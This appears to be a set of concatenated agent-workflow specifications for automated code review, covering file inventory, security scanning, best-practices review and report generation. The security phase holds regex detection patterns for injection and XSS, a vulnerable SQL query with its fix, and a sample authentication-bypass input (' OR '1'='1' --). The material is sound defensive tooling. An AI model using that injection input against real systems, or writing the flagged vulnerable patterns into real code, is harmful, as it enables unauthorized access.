||||
|
||||
### Step 2: Discover Files
|
||||
|
||||
Use MCP tools for efficient file discovery:
|
||||
|
||||
```javascript
|
||||
// Use smart_search for file discovery
|
||||
const files = await mcp__ccw_tools__smart_search({
|
||||
action: "find_files",
|
||||
pattern: scope,
|
||||
includeHidden: false
|
||||
});
|
||||
|
||||
// Apply exclusion patterns
|
||||
const filteredFiles = files.filter(file => {
|
||||
return !exclude.some(pattern => minimatch(file, pattern));
|
||||
});
|
||||
```
|
||||
|
||||
### Step 3: Categorize Files
|
||||
|
||||
Categorize files by:
|
||||
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
|
||||
- **File Type**: Source, config, test, build
|
||||
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
|
||||
|
||||
```javascript
|
||||
const inventory = {
|
||||
critical: {
|
||||
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
|
||||
payment: ['src/payment/stripe.ts'],
|
||||
},
|
||||
high: {
|
||||
api: ['src/api/users.ts', 'src/api/orders.ts'],
|
||||
database: ['src/db/queries.ts'],
|
||||
},
|
||||
medium: {
|
||||
utils: ['src/utils/validator.ts'],
|
||||
services: ['src/services/*.ts'],
|
||||
},
|
||||
low: {
|
||||
types: ['src/types/*.ts'],
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 4: Extract Metadata
|
||||
|
||||
For each file, extract:
|
||||
- **Lines of Code (LOC)**
|
||||
- **Complexity Indicators**: Function count, class count
|
||||
- **Dependencies**: Import statements
|
||||
- **Framework Detection**: Express, React, Django, etc.
|
||||
|
||||
```javascript
|
||||
const metadata = files.map(file => ({
|
||||
path: file,
|
||||
language: detectLanguage(file),
|
||||
loc: countLines(file),
|
||||
complexity: estimateComplexity(file),
|
||||
framework: detectFramework(file),
|
||||
priority: categorizePriority(file)
|
||||
}));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### File Inventory
|
||||
|
||||
Save to `.code-review/inventory.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T10:30:00Z",
|
||||
"total_files": 247,
|
||||
"by_language": {
|
||||
"typescript": 185,
|
||||
"python": 42,
|
||||
"javascript": 15,
|
||||
"go": 5
|
||||
},
|
||||
"by_priority": {
|
||||
"critical": 12,
|
||||
"high": 45,
|
||||
"medium": 120,
|
||||
"low": 70
|
||||
},
|
||||
"files": [
|
||||
{
|
||||
"path": "src/auth/login.ts",
|
||||
"language": "typescript",
|
||||
"loc": 245,
|
||||
"functions": 8,
|
||||
"classes": 2,
|
||||
"priority": "critical",
|
||||
"framework": "express",
|
||||
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Summary Report
|
||||
|
||||
```markdown
|
||||
## Code Discovery Summary
|
||||
|
||||
**Scope**: src/**/*
|
||||
**Total Files**: 247
|
||||
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
|
||||
|
||||
### Priority Distribution
|
||||
- Critical: 12 files (authentication, payment processing)
|
||||
- High: 45 files (API endpoints, database queries)
|
||||
- Medium: 120 files (utilities, services)
|
||||
- Low: 70 files (types, configs)
|
||||
|
||||
### Key Areas Identified
|
||||
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
|
||||
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
|
||||
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
|
||||
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
|
||||
|
||||
**Next Phase**: Security Analysis on Critical + High priority files
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
Save phase state for potential resume:
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "01-code-discovery",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T10:35:00Z",
|
||||
"output": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"total_files": 247,
|
||||
"critical_files": 12,
|
||||
"high_files": 45
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
|
||||
|
||||
**Instructions**:
|
||||
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
|
||||
2. Apply exclusion patterns from config or arguments
|
||||
3. Categorize files by language, type, and priority
|
||||
4. Extract basic metadata (LOC, complexity indicators)
|
||||
5. Save inventory to .code-review/inventory.json
|
||||
6. Generate summary report
|
||||
7. Proceed to Phase 2 with critical + high priority files
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (file discovery)
|
||||
- Read (read configuration and sample files)
|
||||
- Write (save inventory and reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- inventory.json with complete file list and metadata
|
||||
- Summary markdown report
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Files Found
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length === 0) {
|
||||
throw new Error(`No files found matching scope: ${scope}
|
||||
|
||||
Suggestions:
|
||||
- Check if scope pattern is correct
|
||||
- Verify exclude patterns are not too broad
|
||||
- Ensure project has code files in specified scope
|
||||
`);
|
||||
}
|
||||
```
|
||||
|
||||
### Large Codebase
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length > 1000) {
|
||||
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
|
||||
console.log(`Consider using --scope to review in batches`);
|
||||
|
||||
// Offer to focus on critical/high priority only
|
||||
const answer = await askUser("Review critical/high priority files only?");
|
||||
if (answer === 'yes') {
|
||||
filteredFiles = filteredFiles.filter(f =>
|
||||
f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 2:
|
||||
|
||||
- ✅ Inventory file created
|
||||
- ✅ At least one file categorized as critical or high priority
|
||||
- ✅ Metadata extracted for all files
|
||||
- ✅ Summary report generated
|
||||
- ✅ State saved for resume capability
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.
|
||||
# Phase 2: Security Analysis

## Objective

Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
|
||||
- **User Arguments**:
|
||||
- `--focus security`: Security-only mode
|
||||
- `--severity critical,high,medium,low`: Minimum severity to report
|
||||
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Security Rules
|
||||
|
||||
```javascript
|
||||
// Load security check definitions
|
||||
const securityRules = {
|
||||
owasp_top_10: [
|
||||
'injection',
|
||||
'broken_authentication',
|
||||
'sensitive_data_exposure',
|
||||
'xxe',
|
||||
'broken_access_control',
|
||||
'security_misconfiguration',
|
||||
'xss',
|
||||
'insecure_deserialization',
|
||||
'vulnerable_components',
|
||||
'insufficient_logging'
|
||||
],
|
||||
cwe_top_25: [
|
||||
'cwe-79', // XSS
|
||||
'cwe-89', // SQL Injection
|
||||
'cwe-20', // Improper Input Validation
|
||||
'cwe-78', // OS Command Injection
|
||||
'cwe-190', // Integer Overflow
|
||||
// ... more CWE checks
|
||||
]
|
||||
};
|
||||
|
||||
// Load language-specific rules
|
||||
const languageRules = {
|
||||
typescript: require('./rules/typescript-security.json'),
|
||||
python: require('./rules/python-security.json'),
|
||||
java: require('./rules/java-security.json'),
|
||||
go: require('./rules/go-security.json'),
|
||||
};
|
||||
```
|
||||
|
||||
### Step 2: Analyze Files for Vulnerabilities
|
||||
|
||||
For each file in the inventory, perform security analysis:
|
||||
|
||||
```javascript
|
||||
const findings = [];
|
||||
|
||||
for (const file of inventory.files) {
|
||||
if (file.priority !== 'critical' && file.priority !== 'high') continue;
|
||||
|
||||
// Read file content
|
||||
const content = await Read({ file_path: file.path });
|
||||
|
||||
// Run security checks
|
||||
const fileFindings = await runSecurityChecks(content, file, {
|
||||
rules: securityRules,
|
||||
languageRules: languageRules[file.language],
|
||||
severity: args.severity || 'medium'
|
||||
});
|
||||
|
||||
findings.push(...fileFindings);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: Security Check Patterns
|
||||
|
||||
#### A. Injection Vulnerabilities
|
||||
|
||||
**SQL Injection**:
|
||||
```javascript
|
||||
// Pattern: String concatenation in SQL queries
|
||||
const sqlInjectionPatterns = [
|
||||
/\$\{.*\}.*SELECT/, // Template literal with SELECT
|
||||
/"SELECT.*\+\s*\w+/, // String concatenation
|
||||
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
|
||||
/query\(.*\+.*\)/, // Query concatenation
|
||||
];
|
||||
|
||||
// Check code
|
||||
for (const pattern of sqlInjectionPatterns) {
|
||||
const matches = content.matchAll(new RegExp(pattern, 'g'));
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
type: 'sql-injection',
|
||||
severity: 'critical',
|
||||
line: getLineNumber(content, match.index),
|
||||
code: match[0],
|
||||
file: file.path,
|
||||
message: 'Potential SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries or ORM methods',
|
||||
cwe: 'CWE-89',
|
||||
owasp: 'A03:2021 - Injection'
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Command Injection**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized input in exec/spawn
|
||||
const commandInjectionPatterns = [
|
||||
/exec\(.*\$\{.*\}/, // exec with template literal
|
||||
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
|
||||
/execSync\(.*\+.*\)/, // execSync with concatenation
|
||||
];
|
||||
```
|
||||
|
||||
**XSS (Cross-Site Scripting)**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized user input in DOM/HTML
|
||||
const xssPatterns = [
|
||||
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
|
||||
/dangerouslySetInnerHTML/, // React dangerous prop
|
||||
/document\.write\(.*\)/, // document.write
|
||||
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
|
||||
];
|
||||
```
|
||||
|
||||
#### B. Authentication & Authorization
|
||||
|
||||
```javascript
|
||||
// Pattern: Weak authentication
|
||||
const authPatterns = [
|
||||
/password\s*===?\s*['"]/, // Hardcoded password comparison
|
||||
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
|
||||
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
|
||||
/md5\(.*password.*\)/, // MD5 for passwords
|
||||
/if\s*\(\s*user\s*\)\s*\{/, // Missing auth check
|
||||
];
|
||||
|
||||
// Check for missing authorization
|
||||
const authzPatterns = [
|
||||
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
|
||||
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
|
||||
];
|
||||
```
|
||||
|
||||
#### C. Sensitive Data Exposure
|
||||
|
||||
```javascript
|
||||
// Pattern: Sensitive data in logs/responses
|
||||
const sensitiveDataPatterns = [
|
||||
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
|
||||
/console\.log\(.*password.*\)/i, // Password in logs
|
||||
/res\.send\(.*user.*password.*\)/, // Password in response
|
||||
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
|
||||
];
|
||||
```
|
||||
|
||||
#### D. Security Misconfiguration
|
||||
|
||||
```javascript
|
||||
// Pattern: Insecure configurations
|
||||
const misconfigPatterns = [
|
||||
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
|
||||
/https?\s*:\s*false/, // HTTPS disabled
|
||||
/helmet\(\)/, // Missing helmet config
|
||||
/strictMode\s*:\s*false/, // Strict mode disabled
|
||||
];
|
||||
```
|
||||
|
||||
### Step 4: Language-Specific Checks
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
```javascript
|
||||
const jsFindings = [
|
||||
checkPrototypePollution(content),
|
||||
checkEvalUsage(content),
|
||||
checkUnsafeRegex(content),
|
||||
checkWeakCrypto(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Python**:
|
||||
```javascript
|
||||
const pythonFindings = [
|
||||
checkPickleVulnerabilities(content),
|
||||
checkYamlUnsafeLoad(content),
|
||||
checkSqlAlchemy(content),
|
||||
checkFlaskSecurityHeaders(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Java**:
|
||||
```javascript
|
||||
const javaFindings = [
|
||||
checkDeserialization(content),
|
||||
checkXXE(content),
|
||||
checkPathTraversal(content),
|
||||
checkSQLInjection(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Go**:
|
||||
```javascript
|
||||
const goFindings = [
|
||||
checkRaceConditions(content),
|
||||
checkSQLInjection(content),
|
||||
checkPathTraversal(content),
|
||||
checkCryptoWeakness(content),
|
||||
];
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Security Findings File
|
||||
|
||||
Save to `.code-review/security-findings.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T11:00:00Z",
|
||||
"total_findings": 24,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 8,
|
||||
"medium": 10,
|
||||
"low": 3
|
||||
},
|
||||
"by_category": {
|
||||
"injection": 5,
|
||||
"authentication": 3,
|
||||
"data_exposure": 4,
|
||||
"misconfiguration": 6,
|
||||
"xss": 3,
|
||||
"other": 3
|
||||
},
|
||||
"findings": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145,
|
||||
"column": 12,
|
||||
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
|
||||
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
|
||||
"cwe": "CWE-89",
|
||||
"owasp": "A03:2021 - Injection",
|
||||
"recommendation": {
|
||||
"description": "Use parameterized queries to prevent SQL injection",
|
||||
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
|
||||
},
|
||||
"references": [
|
||||
"https://owasp.org/www-community/attacks/SQL_Injection",
|
||||
"https://cwe.mitre.org/data/definitions/89.html"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Security Report
|
||||
|
||||
Generate markdown report:
|
||||
|
||||
```markdown
|
||||
# Security Analysis Report
|
||||
|
||||
**Scan Date**: 2024-01-15 11:00:00
|
||||
**Files Analyzed**: 57 (Critical + High priority)
|
||||
**Total Findings**: 24
|
||||
|
||||
## Severity Summary
|
||||
|
||||
| Severity | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Critical | 3 | 12.5% |
|
||||
| High | 8 | 33.3% |
|
||||
| Medium | 10 | 41.7% |
|
||||
| Low | 3 | 12.5% |
|
||||
|
||||
## Critical Findings (Requires Immediate Action)
|
||||
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
|
||||
### 🔴 [SEC-002] Hardcoded JWT Secret
|
||||
|
||||
**File**: `src/auth/jwt.ts:23`
|
||||
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
|
||||
\`\`\`
|
||||
|
||||
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use environment variable with strong secret
|
||||
const token = jwt.sign(payload, process.env.JWT_SECRET, {
|
||||
expiresIn: '1h',
|
||||
algorithm: 'HS256'
|
||||
});
|
||||
|
||||
// Generate strong secret (32+ bytes):
|
||||
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
|
||||
\`\`\`
|
||||
|
||||
---
|
||||
|
||||
## High Findings
|
||||
|
||||
### 🟠 [SEC-003] Missing Input Validation
|
||||
|
||||
**File**: `src/api/users.ts:67`
|
||||
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
...
|
||||
|
||||
## Medium Findings
|
||||
|
||||
...
|
||||
|
||||
## Remediation Priority
|
||||
|
||||
1. **Critical (3)**: Fix within 24 hours
|
||||
2. **High (8)**: Fix within 1 week
|
||||
3. **Medium (10)**: Fix within 1 month
|
||||
4. **Low (3)**: Fix in next release
|
||||
|
||||
## Compliance Impact
|
||||
|
||||
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
|
||||
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
|
||||
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "02-security-analysis",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T11:15:00Z",
|
||||
"input": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"files_analyzed": 57
|
||||
},
|
||||
"output": {
|
||||
"findings_path": ".code-review/security-findings.json",
|
||||
"total_findings": 24,
|
||||
"critical_count": 3,
|
||||
"high_count": 8
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
|
||||
|
||||
**Instructions**:
|
||||
1. Load file inventory from Phase 1
|
||||
2. Focus on Critical + High priority files
|
||||
3. Run security checks for:
|
||||
- OWASP Top 10 vulnerabilities
|
||||
- CWE Top 25 weaknesses
|
||||
- Language-specific security patterns
|
||||
4. Use smart_search with mode="ripgrep" for pattern matching
|
||||
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
|
||||
6. Classify findings by severity (Critical/High/Medium/Low)
|
||||
7. Generate security-findings.json and markdown report
|
||||
8. Proceed to Phase 3 (Best Practices Review)
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (pattern search)
|
||||
- mcp__ace-tool__search_context (semantic search)
|
||||
- Read (read file content)
|
||||
- Write (save findings and reports)
|
||||
- Grep (targeted pattern matching)
|
||||
|
||||
**Output Requirements**:
|
||||
- security-findings.json with detailed findings
|
||||
- Security report in markdown format
|
||||
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 3:
|
||||
|
||||
- ✅ All Critical + High priority files analyzed
|
||||
- ✅ Findings categorized by severity
|
||||
- ✅ Each finding has fix recommendation
|
||||
- ✅ CWE and OWASP mappings included
|
||||
- ✅ Security report generated
|
||||
- ✅ State saved
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.
|
||||
# Phase 3: Best Practices Review

## Objective

Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
|
||||
- **User Arguments**:
|
||||
- `--focus best-practices`: Best practices only mode
|
||||
- `--check quality,performance,maintainability`: Specific areas to check
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Code Quality Analysis
|
||||
|
||||
Check naming conventions, function complexity, code duplication, and dead code detection.
|
||||
|
||||
### Step 2: Performance Analysis
|
||||
|
||||
Detect N+1 queries, inefficient algorithms, and memory leaks.
|
||||
|
||||
### Step 3: Maintainability Analysis
|
||||
|
||||
Check documentation coverage, test coverage, and dependency management.
|
||||
|
||||
## Output
|
||||
|
||||
- best-practices-findings.json
|
||||
- Markdown report with recommendations
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 4: Report Generation**
|
||||
# Phase 4: Report Generation

## Objective

Consolidate security and best practices findings into a comprehensive, actionable code review report.
|
||||
|
||||
## Input
|
||||
|
||||
- **Security Findings**: `.code-review/security-findings.json`
|
||||
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
|
||||
- **File Inventory**: `.code-review/inventory.json`
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load All Findings
|
||||
|
||||
```javascript
|
||||
const securityFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/security-findings.json' })
|
||||
);
|
||||
const bestPracticesFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/best-practices-findings.json' })
|
||||
);
|
||||
const inventory = JSON.parse(
|
||||
await Read({ file_path: '.code-review/inventory.json' })
|
||||
);
|
||||
```
|
||||
|
||||
### Step 2: Aggregate Statistics
|
||||
|
||||
```javascript
|
||||
const stats = {
|
||||
total_files_reviewed: inventory.total_files,
|
||||
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
|
||||
by_severity: {
|
||||
critical: securityFindings.by_severity.critical,
|
||||
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
|
||||
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
|
||||
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
|
||||
},
|
||||
by_category: {
|
||||
security: securityFindings.total_findings,
|
||||
code_quality: bestPracticesFindings.by_category.code_quality,
|
||||
performance: bestPracticesFindings.by_category.performance,
|
||||
maintainability: bestPracticesFindings.by_category.maintainability,
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 3: Generate Comprehensive Report
|
||||
|
||||
```markdown
|
||||
# Comprehensive Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
## Executive Summary
|
||||
|
||||
{Provide high-level overview of code health}
|
||||
|
||||
### Risk Assessment
|
||||
|
||||
{Calculate risk score based on findings}
|
||||
|
||||
### Compliance Status
|
||||
|
||||
{Map findings to compliance requirements}
|
||||
|
||||
## Detailed Findings
|
||||
|
||||
{Merge and organize security + best practices findings}
|
||||
|
||||
## Action Plan
|
||||
|
||||
{Prioritized list of fixes with effort estimates}
|
||||
|
||||
## Appendix
|
||||
|
||||
{Technical details, references, configuration}
|
||||
```
|
||||
|
||||
### Step 4: Generate Fix Tracking Checklist
|
||||
|
||||
Create actionable checklist for developers:
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
## Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
|
||||
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
|
||||
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
|
||||
|
||||
## High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
|
||||
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
|
||||
...
|
||||
```
|
||||
|
||||
### Step 5: Generate Metrics Dashboard
|
||||
|
||||
```markdown
|
||||
## Code Health Metrics
|
||||
|
||||
### Security Score: 68/100
- Critical Issues: 3 (-8 points each)
- High Issues: 8 (-1 point each)
|
||||
|
||||
### Code Quality Score: 75/100
|
||||
- High Complexity Functions: 2
|
||||
- Code Duplication: 5%
|
||||
- Dead Code: 3 instances
|
||||
|
||||
### Performance Score: 82/100
|
||||
- N+1 Queries: 3
|
||||
- Inefficient Algorithms: 2
|
||||
|
||||
### Maintainability Score: 70/100
|
||||
- Documentation Coverage: 65%
|
||||
- Test Coverage: 72%
|
||||
- Missing Tests: 5 files
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Main Report
|
||||
|
||||
Save to `.code-review/REPORT.md`:
|
||||
|
||||
- Executive summary
|
||||
- Detailed findings (security + best practices)
|
||||
- Action plan with priorities
|
||||
- Metrics and scores
|
||||
- References and compliance mapping
|
||||
|
||||
### Fix Checklist
|
||||
|
||||
Save to `.code-review/FIX-CHECKLIST.md`:
|
||||
|
||||
- Organized by severity
|
||||
- Checkboxes for tracking
|
||||
- File:line references
|
||||
- Effort estimates
|
||||
|
||||
### JSON Summary
|
||||
|
||||
Save to `.code-review/summary.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"total_findings": 69,
|
||||
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true
|
||||
}
|
||||
```
|
||||
|
||||
## Report Template
|
||||
|
||||
Full report includes:
|
||||
|
||||
1. **Executive Summary**
|
||||
- Overall code health
|
||||
- Risk assessment
|
||||
- Key recommendations
|
||||
|
||||
2. **Security Findings** (from Phase 2)
|
||||
- Critical/High/Medium/Low
|
||||
- OWASP/CWE mappings
|
||||
- Fix recommendations with code examples
|
||||
|
||||
3. **Best Practices Findings** (from Phase 3)
|
||||
- Code quality issues
|
||||
- Performance concerns
|
||||
- Maintainability gaps
|
||||
|
||||
4. **Metrics Dashboard**
|
||||
- Security score
|
||||
- Code quality score
|
||||
- Performance score
|
||||
- Maintainability score
|
||||
|
||||
5. **Action Plan**
|
||||
- Immediate actions (critical)
|
||||
- Short-term (1 week)
|
||||
- Medium-term (1 month)
|
||||
- Long-term (3 months)
|
||||
|
||||
6. **Compliance Impact**
|
||||
- PCI DSS findings
|
||||
- HIPAA findings
|
||||
- GDPR findings
|
||||
- SOC 2 findings
|
||||
|
||||
7. **Appendix**
|
||||
- Full findings list
|
||||
- Configuration used
|
||||
- Tools and versions
|
||||
- References
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "04-report-generation",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T12:00:00Z",
|
||||
"input": {
|
||||
"security_findings": ".code-review/security-findings.json",
|
||||
"best_practices_findings": ".code-review/best-practices-findings.json"
|
||||
},
|
||||
"output": {
|
||||
"report": ".code-review/REPORT.md",
|
||||
"checklist": ".code-review/FIX-CHECKLIST.md",
|
||||
"summary": ".code-review/summary.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
|
||||
|
||||
**Instructions**:
|
||||
1. Load security findings from Phase 2
|
||||
2. Load best practices findings from Phase 3
|
||||
3. Aggregate statistics and calculate scores
|
||||
4. Generate comprehensive markdown report
|
||||
5. Create fix tracking checklist
|
||||
6. Generate JSON summary
|
||||
7. Inform user of completion and output locations
|
||||
|
||||
**Tools Available**:
|
||||
- Read (load findings)
|
||||
- Write (save reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- REPORT.md (comprehensive markdown report)
|
||||
- FIX-CHECKLIST.md (actionable checklist)
|
||||
- summary.json (machine-readable summary)
|
||||
- All files in .code-review/ directory
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Action plan generated
|
||||
- ✅ Reports saved to .code-review/
|
||||
- ✅ User notified of completion
|
||||
|
||||
## Completion
|
||||
|
||||
Code review complete! Outputs available in `.code-review/` directory.
|
||||
# Best Practices Requirements Specification

## Code Quality Standards
|
||||
|
||||
### Naming Conventions
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
|
||||
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
|
||||
|
||||
**Python**:
|
||||
- Classes: PascalCase (`UserService`, `DatabaseConnection`)
|
||||
- Functions: snake_case (`get_user_by_id`, `validate_email`)
